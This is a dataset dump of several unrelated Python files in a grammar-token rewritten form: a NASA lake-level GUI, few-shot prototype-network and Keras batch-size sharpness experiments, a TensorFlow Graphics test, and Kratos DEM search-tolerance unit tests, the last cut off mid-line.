content
stringlengths
0
1.55M
# ----------------------------------------------------------------------------- # Copyright * 2014, United States Government, as represented by the # Administrator of the National Aeronautics and Space Administration. All # rights reserved. # # The Crisis Mapping Toolkit (CMT) v1 platform is licensed under the Apache # License, Version 2.0 (the "License"); you may not use this file except in # compliance with the License. You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0. # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. # ----------------------------------------------------------------------------- <import_from_stmt>PyQt4 QtGui QtCore<import_stmt>sys<import_from_stmt>threading Thread<import_from_stmt>LLAMA Ui_Lake_Level_UI<import_from_stmt>plot_water_levelui *<import_from_stmt>lake_measure *<class_stmt>ProgressPopup(QtGui.QWidget)<block_start>update_signal=QtCore.pyqtSignal(int int str str int int)<def_stmt>__init__ self cancel_function<block_start>QtGui.QWidget.__init__(self)<line_sep>self.update_signal.connect(self.apply_update QtCore.Qt.QueuedConnection)<line_sep>self.cancel_function=cancel_function<line_sep>self.lake_totals=<none><line_sep>self.lake_counts=<none><line_sep>self.progressBar=QtGui.QProgressBar(self)<line_sep>self.progressBar.setMinimumSize(500 50)<line_sep>self.progressBar.setMaximumSize(500 50)<line_sep>self.progressBar.setRange(0 100)<line_sep>self.progressBar.setValue(0)<line_sep>self.status=QtGui.QLabel(self)<line_sep>self.status.setText("")<line_sep>self.cancelButton=QtGui.QPushButton('Cancel' self)<line_sep>self.cancelButton.setMinimumSize(50 30)<line_sep>self.cancelButton.setMaximumSize(100 
50)<line_sep>self.cancelButton.clicked[bool].connect(self._cancel)<line_sep>vbox=QtGui.QVBoxLayout(self)<line_sep>vbox.addWidget(self.progressBar)<line_sep>vbox.addWidget(self.status)<line_sep>vbox.addWidget(self.cancelButton)<line_sep>vbox.addStretch(1)<line_sep>self.setLayout(vbox)<block_end><def_stmt>update_function self lakes_number lakes_total lake_name lake_date lake_image lake_image_total<block_start>self.update_signal.emit(lakes_number lakes_total lake_name lake_date lake_image lake_image_total)<block_end><def_stmt>apply_update self lakes_number lakes_total lake_name lake_date lake_image lake_image_total<block_start><if_stmt>self.lake_totals<eq><none><block_start>self.lake_totals=[10]<times>lakes_total<line_sep>self.lake_counts=[0]<times>lakes_total<block_end>self.lake_totals[lakes_number]=lake_image_total<line_sep>self.lake_counts[lakes_number]=lake_image<line_sep>total=sum(self.lake_totals)<line_sep>progress=sum(self.lake_counts)<line_sep>self.status.setText('Completed processing %s on %s.'%(lake_name lake_date))<line_sep>self.progressBar.setValue(float(progress)/total<times>100)<block_end><def_stmt>closeEvent self event<block_start><if_stmt>self.cancel_function<ne><none><block_start>self.cancel_function()<block_end>event.accept()<block_end><def_stmt>_cancel self<block_start>self.close()<block_end><block_end><class_stmt>Lake_Level_App(QtGui.QMainWindow Ui_Lake_Level_UI)<block_start><def_stmt>__init__ self<block_start>super(self.__class__ self).__init__()<line_sep>self.setupUi(self)<line_sep>self.start_date='1984-04-25'<line_sep># Sets end date to current date. self.end_date=str((QtCore.QDate.currentDate()).toString('yyyy-MM-dd'))<line_sep>self.selected_lake='Lake Tahoe'<line_sep>self.selectlakeDropMenu.activated[str].connect(self.selectLakeHandle)<line_sep>self.okBtn.clicked.connect(self.okHandle)<line_sep># Sets end date as current date. 
Couldn't set this option in QT Designer self.endDate.setDate(QtCore.QDate.currentDate())<line_sep>self.endDate.dateChanged[QtCore.QDate].connect(self.endHandle)<line_sep>self.startDate.dateChanged[QtCore.QDate].connect(self.startHandle)<line_sep>self.faiState=<false><line_sep>self.ndtiState=<false><line_sep>self.completedSignal.connect(self.completeLakeThread QtCore.Qt.QueuedConnection)<block_end><def_stmt>selectLakeHandle self text<block_start>self.selected_lake=str(text)<block_end><def_stmt>startHandle self date<block_start>self.start_date=str(date.toString('yyyy-MM-dd'))<block_end><def_stmt>endHandle self date<block_start>self.end_date=str(date.toString('yyyy-MM-dd'))<block_end>completedSignal=QtCore.pyqtSignal()<line_sep>@QtCore.pyqtSlot()<def_stmt>completeLakeThread self<block_start><if_stmt>self.tableCheckbox.isChecked()<block_start>table_water_level(self.selected_lake self.start_date self.end_date result_dir='results' output_file=self.table_output_file)<block_end><if_stmt>self.graphCheckbox.isChecked()<block_start>plot_water_level(self.selected_lake self.start_date self.end_date result_dir='results')<block_end>self.popup.close()<block_end><def_stmt>okHandle self<block_start><if_stmt>self.algaeCheckbox.isChecked()<block_start>self.faiState=<true><block_end><else_stmt><block_start>self.faiState=<false><block_end><if_stmt>self.turbidityCheckbox.isChecked()<block_start>self.ndtiState=<true><block_end><else_stmt><block_start>self.ndtiState=<false><block_end># Heat map checkbox is not functioning. 
Add under here: # if self.lake_areaCheckbox.isChecked(): <if_stmt>self.tableCheckbox.isChecked()<block_start>self.table_output_file=QtGui.QFileDialog.getSaveFileName(self 'Choose Output File' 'results/'+self.selected_lake+'.csv' 'CSV File (*.csv *.txt)')<block_end>self.popup=ProgressPopup(Lake_Level_Cancel)<line_sep>self.lake_thread=Thread(target=Lake_Level_Run args=(self.selected_lake self.start_date self.end_date 'results' self.faiState self.ndtiState self.popup.update_function self.completedSignal.emit))<line_sep>self.popup.show()<line_sep>self.lake_thread.start()<line_sep># CHANGE THIS. NEED TO MAKE THESE PARTS WAIT UNTIL LAKE_THREAD IS FINISHED. <block_end><block_end><def_stmt>main <block_start>app=QtGui.QApplication(sys.argv)# A new instance of QApplication form=Lake_Level_App()# We set the form to be our ExampleApp (design) form.show()# Show the form app.exec_()# and execute the app <block_end><if_stmt>__name__<eq>'__main__'# if we're running file directly and not importing it <block_start>main()<block_end>
"""Runs a baseline for prototype networks for incremental few-shot learning. Author: <NAME> (<EMAIL>) See run_exp.py for usage. """<import_from_future_stmt> absolute_import division print_function unicode_literals <import_stmt>numpy<as>np<import_stmt>os<import_stmt>six<import_stmt>tensorflow<as>tf<import_from_stmt>tqdm tqdm<import_from_stmt>fewshot.utils logger<import_from_stmt>run_exp get_config get_restore_saver get_datasets get_model save_config get_exp_logger get_saver restore_model final_log <import_from_stmt>train_lib get_metadata<line_sep>log=logger.get()<line_sep>FLAGS=tf.flags.FLAGS<def_stmt>calculate_protos sess model num_classes_a task_a_it num_steps<block_start>"""Calculates the prototypes of the entire training set."""<line_sep>prototypes=[]<for_stmt>idx six.moves.xrange(num_classes_a)<block_start>prototypes.append([])<block_end><for_stmt>step six.moves.xrange(num_steps)<block_start>x,y=task_a_it.next()<line_sep>h=sess.run(model.h_a feed_dict={model.inputs:x})<for_stmt>jj,idx enumerate(y)<block_start>prototypes[idx].append(h[jj])<block_end><block_end><for_stmt>idx six.moves.xrange(num_classes_a)<block_start>prototypes[idx]=np.array(prototypes[idx]).mean(axis=0)<block_end><return>np.array(prototypes)<block_end><def_stmt>calculate_episode_protos sess model num_classes_a nway episode old_and_new<block_start>"""Caluclates the prototypes of a single episode."""<line_sep>prototypes=[]<for_stmt>idx six.moves.xrange(nway)<block_start>prototypes.append([])<block_end>h=sess.run(model.h_a feed_dict={model.inputs:episode.x_train})<for_stmt>idx six.moves.xrange(episode.x_train.shape[0])<block_start><if_stmt>old_and_new<block_start>prototypes[episode.y_train[idx]-num_classes_a].append(h[idx])<block_end><else_stmt><block_start>prototypes[episode.y_train[idx]].append(h[idx])<block_end><block_end><for_stmt>idx six.moves.xrange(nway)<block_start>prototypes[idx]=np.array(prototypes[idx]).mean(axis=0)<block_end><return>np.array(prototypes)<block_end><def_stmt>cosine h 
protos<block_start>"""Cosine similarity."""<line_sep>proto_t=protos.T<line_sep>result=np.dot(h proto_t)/np.sqrt(np.sum(h<power>2 axis=1 keepdims=<true>))/np.sqrt(np.sum(proto_t<power>2 axis=0 keepdims=<true>))<line_sep><return>result<block_end><def_stmt>euclidean h protos<block_start>"""Euclidean similarity."""<line_sep>h_=np.expand_dims(h 1)<line_sep>protos_=np.expand_dims(protos 0)<line_sep><return>-np.sum((h_-protos_)<power>2 axis=2)<block_end><def_stmt>dot h protos<block_start>"""Dot product."""<line_sep><return>np.dot(h protos.T)<block_end><def_stmt>evaluate_b sess model task_it num_steps num_classes_a num_classes_b prototypes_a=<none> old_and_new=<false> similarity='euclidean'<block_start>"""Evaluate the model on task A."""<line_sep>acc_list=np.zeros([num_steps])<if_stmt>old_and_new<block_start>acc_list_old=np.zeros([num_steps])<line_sep>acc_list_new=np.zeros([num_steps])<line_sep>acc_list_old2=np.zeros([num_steps])<line_sep>acc_list_new2=np.zeros([num_steps])<block_end>it=tqdm(six.moves.xrange(num_steps) ncols=0)<for_stmt>tt it<block_start>task_data=task_it.next()<line_sep>prototypes_b=calculate_episode_protos(sess model num_classes_a num_classes_b task_data old_and_new)<if_stmt>old_and_new<block_start>all_prototypes=np.concatenate([prototypes_a prototypes_b])<block_end><else_stmt><block_start>all_prototypes=prototypes_b<block_end>h_test=sess.run(model.h_a feed_dict={model.inputs:task_data.x_test})<if_stmt>similarity<eq>'cosine'<block_start>logits=cosine(h_test all_prototypes)<block_end><elif_stmt>similarity<eq>'euclidean'<block_start>logits=euclidean(h_test all_prototypes)<block_end><elif_stmt>similarity<eq>'dot'<block_start>logits=dot(h_test all_prototypes)<block_end><else_stmt><block_start><raise>ValueError('Unknown similarity function')<block_end>correct=np.equal(np.argmax(logits axis=1) 
task_data.y_test).astype(np.float32)<line_sep>_acc=correct.mean()<line_sep>acc_list[tt]=_acc<if_stmt>old_and_new<block_start>is_new=task_data.y_test<ge>num_classes_a<line_sep>is_old=np.logical_not(is_new)<line_sep>_acc_old=correct[is_old].mean()<line_sep>_acc_new=correct[is_new].mean()<line_sep>correct_new=np.equal(np.argmax(logits[is_new num_classes_a:] axis=1) task_data.y_test[is_new]-num_classes_a).astype(np.float32)<line_sep>_acc_new2=correct_new.mean()<line_sep>correct_old=np.equal(np.argmax(logits[is_old :num_classes_a] axis=1) task_data.y_test[is_old]).astype(np.float32)<line_sep>_acc_old2=correct_old.mean()<line_sep>acc_list_old[tt]=_acc_old<line_sep>acc_list_new[tt]=_acc_new<line_sep>acc_list_new2[tt]=_acc_new2<line_sep>acc_list_old2[tt]=_acc_old2<line_sep>it.set_postfix(acc_b=u'{:.3f}±{:.3f}'.format(np.array(acc_list).sum()<times>100.0/float(tt+1) np.array(acc_list).std()/np.sqrt(float(tt+1))<times>100.0) acc_b_old=u'{:.3f}±{:.3f}'.format(np.array(acc_list_old).sum()<times>100.0/float(tt+1) np.array(acc_list_old).std()/np.sqrt(float(tt+1))<times>100.0) acc_b_old2=u'{:.3f}±{:.3f}'.format(np.array(acc_list_old2).sum()<times>100.0/float(tt+1) np.array(acc_list_old2).std()/np.sqrt(float(tt+1))<times>100.0) acc_b_new=u'{:.3f}±{:.3f}'.format(np.array(acc_list_new).sum()<times>100.0/float(tt+1) np.array(acc_list_new).std()/np.sqrt(float(tt+1))<times>100.0) acc_b_new2=u'{:.3f}±{:.3f}'.format(np.array(acc_list_new2).sum()<times>100.0/float(tt+1) np.array(acc_list_new2).std()/np.sqrt(float(tt+1))<times>100.0))<block_end><else_stmt><block_start>it.set_postfix(acc_b=u'{:.3f}±{:.3f}'.format(np.array(acc_list).sum()<times>100.0/float(tt+1) np.array(acc_list).std()/np.sqrt(float(tt+1))<times>100.0))<block_end><block_end>results_dict={'acc':acc_list.mean() 
'acc_se':acc_list.std()/np.sqrt(float(acc_list.size))}<if_stmt>old_and_new<block_start>results_dict['acc_old']=acc_list_old.mean()<line_sep>results_dict['acc_old_se']=acc_list_old.std()/np.sqrt(float(acc_list_old.size))<line_sep>results_dict['acc_old2']=acc_list_old2.mean()<line_sep>results_dict['acc_old2_se']=acc_list_old2.std()/np.sqrt(float(acc_list_old2.size))<line_sep>results_dict['acc_new']=acc_list_new.mean()<line_sep>results_dict['acc_new_se']=acc_list_new.std()/np.sqrt(float(acc_list_new.size))<line_sep>results_dict['acc_new2']=acc_list_new2.mean()<line_sep>results_dict['acc_new2_se']=acc_list_new2.std()/np.sqrt(float(acc_list_new2.size))<line_sep>results_dict['delta_a']=results_dict['acc_old']-results_dict['acc_old2']<line_sep>results_dict['delta_b']=results_dict['acc_new']-results_dict['acc_new2']<line_sep>results_dict['delta']=0.5<times>(results_dict['delta_a']+results_dict['delta_b'])<block_end><return>results_dict<block_end><def_stmt>main # ------------------------------------------------------------------------ # Flags <block_start>nshot=FLAGS.nshot<line_sep>dataset=FLAGS.dataset<line_sep>nclasses_train=FLAGS.nclasses_b<line_sep>nclasses_val=FLAGS.nclasses_b<line_sep>nclasses_test=FLAGS.nclasses_b<line_sep>num_test=FLAGS.ntest<line_sep>is_eval=FLAGS.eval<line_sep>nepisode_final=FLAGS.nepisode_final<line_sep>run_test=FLAGS.test<line_sep>pretrain=FLAGS.pretrain<line_sep>retest=FLAGS.retest<line_sep>tag=FLAGS.tag<line_sep># ------------------------------------------------------------------------ # Configuration config=get_config(FLAGS.config)<line_sep>opt_config=config.optimizer_config<line_sep>old_and_new=config.transfer_config.old_and_new<line_sep>similarity=config.protonet_config.similarity<line_sep># ------------------------------------------------------------------------ # Log folder <assert_stmt>tag<is><not><none> 'Please add a name for the experiment'<line_sep>log_folder=os.path.join(FLAGS.results dataset 'n{}w{}'.format(nshot nclasses_val) 
tag)<line_sep>log.info('Experiment ID {}'.format(tag))<if_stmt><not>os.path.exists(log_folder)<block_start>os.makedirs(log_folder)<block_end><elif_stmt><not>is_eval<block_start><assert_stmt><false> 'Folder {} exists. Pick another tag.'.format(log_folder)<block_end># ------------------------------------------------------------------------ # Model metadata=get_metadata(dataset)<with_stmt>log.verbose_level(2)<block_start>model_dict=get_model(config metadata['num_classes_a'] nclasses_train nclasses_val nclasses_test is_eval=is_eval)<line_sep>model=model_dict['val']<line_sep>modelv=model_dict['val']<block_end># ------------------------------------------------------------------------ # Dataset seed=0<with_stmt>log.verbose_level(2)<block_start>data=get_datasets(dataset metadata nshot num_test opt_config.batch_size opt_config.num_gpu metadata['num_classes_a'] nclasses_train nclasses_val nclasses_test old_and_new seed <true>)<block_end># ------------------------------------------------------------------------ # Save configurations save_config(config log_folder)<line_sep># ------------------------------------------------------------------------ # Log outputs restore_saver=get_restore_saver(retest=retest cosine_a=modelv.config.protonet_config.cosine_a reinit_tau=modelv.config.protonet_config.reinit_tau)<line_sep>logger=get_exp_logger(log_folder)<line_sep>saver=get_saver(log_folder)<line_sep># ------------------------------------------------------------------------ # Create a TensorFlow session sess_config=tf.ConfigProto()<line_sep>sess_config.gpu_options.allow_growth=<true><line_sep>sess=tf.Session(config=sess_config)<line_sep># ------------------------------------------------------------------------ # Initialize model restore_model(sess model modelv restore_saver is_eval=is_eval pretrain=pretrain)<line_sep># ------------------------------------------------------------------------ # Calculate prototypes A. 
<if_stmt>old_and_new<block_start>prototypes_a=calculate_protos(sess model model.num_classes_a data['a_train'] nepisode_final)<block_end><else_stmt><block_start>prototypes_a=<none><block_end># ------------------------------------------------------------------------ # Run on val set. results={}<line_sep>results['val_b']=evaluate_b(sess model data['b_val'] nepisode_final model.num_classes_a nclasses_val prototypes_a=prototypes_a old_and_new=old_and_new similarity=similarity)<line_sep># ------------------------------------------------------------------------ # Run on test set. <if_stmt>run_test<block_start>results['test_b']=evaluate_b(sess model data['b_test'] nepisode_final model.num_classes_a nclasses_val prototypes_a=prototypes_a old_and_new=old_and_new similarity=similarity)<block_end># ------------------------------------------------------------------------ # Log results. final_log(log_folder results old_and_new=old_and_new)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
''' Train CNNs on the CIFAR10/CIFAR100 Plots a parametric plot between SB and LB minimizers demonstrating the relative sharpness of the two minima. Requirements: - Keras (with Theano) - Matplotlib - Numpy GPU run command: KERAS_BACKEND=theano python plot_parametric_plot.py --network C[1-4] '''<import_from_future_stmt> print_function<import_from_stmt>keras.datasets cifar10 cifar100<import_from_stmt>keras.preprocessing.image ImageDataGenerator<import_from_stmt>keras.models Sequential<import_from_stmt>keras.layers Dense Dropout Activation Flatten<import_from_stmt>keras.layers Convolution2D MaxPooling2D<import_from_stmt>keras.utils np_utils<import_stmt>numpy<import_stmt>matplotlib.pyplot<as>plt<import_stmt>argparse<import_stmt>network_zoo<line_sep>parser=argparse.ArgumentParser(description='''This code first trains the user-specific network (C[1-4]) using small-batch ADAM and large-batch ADAM, and then plots the parametric plot connecting the two minimizers illustrating the sharpness difference.''')<line_sep>parser.add_argument('-n' '--network' help='''Selects which network to plot the parametric plots for. Choices are C1, C2, C3 and C4.''' required=<true>)<line_sep>network_choice=vars(parser.parse_args())['network']<line_sep>nb_epoch=20<line_sep># the data, shuffled and split between train and test sets <if_stmt>network_choice<in>['C1' 'C2']<block_start>(X_train y_train),(X_test y_test)=cifar10.load_data()<line_sep>nb_classes=10<block_end><elif_stmt>network_choice<in>['C3' 'C4']<block_start>(X_train y_train),(X_test y_test)=cifar100.load_data()<line_sep>nb_classes=100<block_end><else_stmt><block_start><raise>ValueError('''Invalid choice of network. Please choose one of C1, C2, C3 or C4. 
Refer to the paper for details regarding these networks''')<block_end>X_train=X_train.astype('float32')<line_sep>X_test=X_test.astype('float32')<line_sep>X_train<augdiv>255<line_sep>X_test<augdiv>255<line_sep># convert class vectors to binary class matrices Y_train=np_utils.to_categorical(y_train nb_classes)<line_sep>Y_test=np_utils.to_categorical(y_test nb_classes)<line_sep># build the network <if_stmt>network_choice<in>['C1' 'C3']<block_start>model=network_zoo.shallownet(nb_classes)<block_end><elif_stmt>network_choice<in>['C2' 'C4']<block_start>model=network_zoo.deepnet(nb_classes)<block_end># let's train the model using Adam model.compile(loss='categorical_crossentropy' optimizer='adam' metrics=['accuracy'])<line_sep>model.save_weights('x0.h5')<line_sep># let's first find the small-batch solution model.fit(X_train Y_train batch_size=256 nb_epoch=nb_epoch validation_data=(X_test Y_test) shuffle=<true>)<line_sep>sb_solution=[p.get_value()<for>p model.trainable_weights]<line_sep># re-compiling to reset the optimizer accumulators model.compile(loss='categorical_crossentropy' optimizer='adam' metrics=['accuracy'])<line_sep># setting the initial (starting) point model.load_weights('x0.h5')<line_sep># now, let's train the large-batch solution model.fit(X_train Y_train batch_size=5000 nb_epoch=nb_epoch validation_data=(X_test Y_test))<line_sep>lb_solution=[p.get_value()<for>p model.trainable_weights]<line_sep># parametric plot data collection # we discretize the interval [-1,2] into 25 pieces alpha_range=numpy.linspace(-1 2 25)<line_sep>data_for_plotting=numpy.zeros((25 4))<line_sep>i=0<for_stmt>alpha alpha_range<block_start><for_stmt>p range(len(sb_solution))<block_start>model.trainable_weights[p].set_value(lb_solution[p]<times>alpha+sb_solution[p]<times>(1-alpha))<block_end>train_xent,train_acc=model.evaluate(X_train Y_train batch_size=5000 verbose=0)<line_sep>test_xent,test_acc=model.evaluate(X_test Y_test batch_size=5000 verbose=0)<line_sep>data_for_plotting[i 
:]=[train_xent train_acc test_xent test_acc]<line_sep>i<augadd>1<block_end># finally, let's plot the data # we plot the XENT loss on the left Y-axis # and accuracy on the right Y-axis # if you don't have Matplotlib, simply print # data_for_plotting to file and use a different plotter fig,ax1=plt.subplots()<line_sep>ax2=ax1.twinx()<line_sep>ax1.plot(alpha_range data_for_plotting[: 0] 'b-')<line_sep>ax1.plot(alpha_range data_for_plotting[: 2] 'b--')<line_sep>ax2.plot(alpha_range data_for_plotting[: 1]<times>100. 'r-')<line_sep>ax2.plot(alpha_range data_for_plotting[: 3]<times>100. 'r--')<line_sep>ax1.set_xlabel('alpha')<line_sep>ax1.set_ylabel('Cross Entropy' color='b')<line_sep>ax2.set_ylabel('Accuracy' color='r')<line_sep>ax1.legend(('Train' 'Test') loc=0)<line_sep>ax1.grid(b=<true> which='both')<line_sep>plt.savefig('Figures/'+network_choice+'.pdf')<line_sep>print('Plot save as '+network_choice+'.pdf in the Figures/ folder')<line_sep>
# Copyright 2020 The TensorFlow Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for feature representations."""<import_from_stmt>absl.testing parameterized<import_from_stmt>tensorflow_graphics.math feature_representation<import_from_stmt>tensorflow_graphics.util test_case<class_stmt>FeatureRepresentationTest(test_case.TestCase)<block_start>@parameterized.parameters((3 (3 )) (4 (2 3)) (8 (5 3 6)) )<def_stmt>test_random_rays_exception_exception_not_raised self num_frequencies *shapes<block_start>"""Tests that the shape exceptions are not raised."""<line_sep>self.assert_exception_is_not_raised(feature_representation.positional_encoding shapes num_frequencies=num_frequencies)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>test_case.main()<block_end>
<import_stmt>os<import_stmt>KratosMultiphysics<import_from_stmt>KratosMultiphysics Logger<line_sep>Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)<import_stmt>KratosMultiphysics.KratosUnittest<as>KratosUnittest<import_stmt>KratosMultiphysics.DEMApplication.DEM_analysis_stage<import_stmt>numpy<as>np<import_stmt>auxiliary_functions_for_tests<line_sep>this_working_dir_backup=os.getcwd()<def_stmt>GetFilePath fileName<block_start><return>os.path.join(os.path.dirname(os.path.realpath(__file__)) fileName)<block_end><class_stmt>DEM3D_SearchToleranceMain(KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage KratosUnittest.TestCase)<block_start><def_stmt>Initialize self<block_start>super().Initialize()<for_stmt>node self.spheres_model_part.Nodes<block_start>self.initial_normal_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Z)<block_end><block_end>@classmethod<def_stmt>GetMainPath self<block_start><return>os.path.join(os.path.dirname(os.path.realpath(__file__)) "test_search_tolerance")<block_end><def_stmt>GetProblemNameWithPath self<block_start><return>os.path.join(self.main_path self.DEM_parameters["problem_name"].GetString())<block_end><def_stmt>FinalizeSolutionStep self<block_start>super().FinalizeSolutionStep()<for_stmt>node self.spheres_model_part.Nodes#reference data with freq=1 searchtolerance=0.0 <block_start><if_stmt>node.Id<eq>2<block_start>tol=1.0e-15<if_stmt>np.isclose(self.time 0.02 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-5.86502139707038<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.115 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-3.3859516373258987<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.22 rtol=0.0 
atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-0.5929799879392164<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><block_end><block_end><block_end><def_stmt>Finalize self<block_start>self.procedures.RemoveFoldersWithResults(str(self.main_path) str(self.problem_name) '')<line_sep>super().Finalize()<block_end><block_end><class_stmt>DEM3D_SearchTolerance1(DEM3D_SearchToleranceMain)<block_start><def_stmt>FinalizeSolutionStep self<block_start>KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)<for_stmt>node self.spheres_model_part.Nodes<block_start><if_stmt>node.Id<eq>2<block_start>tol=1.0e-15<if_stmt>np.isclose(self.time 0.02 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-5.8654458179811835<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.115 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-3.3861319639727263<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.22 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-0.594495289987086<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><block_end><block_end><block_end><block_end><class_stmt>DEM3D_SearchTolerance2(DEM3D_SearchToleranceMain)<block_start><def_stmt>FinalizeSolutionStep self<block_start>KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)<for_stmt>node self.spheres_model_part.Nodes<block_start><if_stmt>node.Id<eq>2<block_start>tol=1.0e-15<if_stmt>np.isclose(self.time 0.02 rtol=0.0 
atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-5.865445816566027<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.115 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-3.386128017385994<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.22 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-0.5941551772701182<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><block_end><block_end><block_end><block_end><class_stmt>DEM3D_SearchTolerance3(DEM3D_SearchToleranceMain)<block_start><def_stmt>FinalizeSolutionStep self<block_start>KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)<for_stmt>node self.spheres_model_part.Nodes<block_start><if_stmt>node.Id<eq>2<block_start>tol=1.0e-15<if_stmt>np.isclose(self.time 0.02 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-5.86502139707038<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.115 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-3.3859516373258987<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.22 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-0.5929799879392164<line_sep>self.assertAlmostEqual(y_vel y_vel_ref 
delta=tol)<block_end><block_end><block_end><block_end><block_end><class_stmt>TestSearchTolerance(KratosUnittest.TestCase)<block_start>@classmethod<def_stmt>test_SearchA self<block_start>path=os.path.join(os.path.dirname(os.path.realpath(__file__)) "test_search_tolerance")<line_sep>parameters_file_name=os.path.join(path "ProjectParametersDEM.json")<with_stmt>open(parameters_file_name 'r')<as>parameter_file<block_start>project_parameters=KratosMultiphysics.Parameters(parameter_file.read())<block_end>project_parameters["SearchTolerance"].SetDouble(0.0)<line_sep>project_parameters["search_tolerance_against_walls"].SetDouble(0.0)<line_sep>project_parameters["NeighbourSearchFrequency"].SetInt(1)<line_sep>model=KratosMultiphysics.Model()<line_sep>auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchToleranceMain model project_parameters auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())<block_end>@classmethod<def_stmt>test_SearchB self<block_start>path=os.path.join(os.path.dirname(os.path.realpath(__file__)) "test_search_tolerance")<line_sep>parameters_file_name=os.path.join(path "ProjectParametersDEM.json")<with_stmt>open(parameters_file_name 'r')<as>parameter_file<block_start>project_parameters=KratosMultiphysics.Parameters(parameter_file.read())<block_end>project_parameters["SearchTolerance"].SetDouble(0.0)<line_sep>project_parameters["search_tolerance_against_walls"].SetDouble(0.0)<line_sep>project_parameters["NeighbourSearchFrequency"].SetInt(10)<line_sep>model=KratosMultiphysics.Model()<line_sep>auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance1 model project_parameters auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())<block_end>@classmethod<def_stmt>test_SearchC self<block_start>path=os.path.join(os.path.dirname(os.path.realpath(__file__)) "test_search_tolerance")<line_sep>parameters_file_name=os.path.join(path 
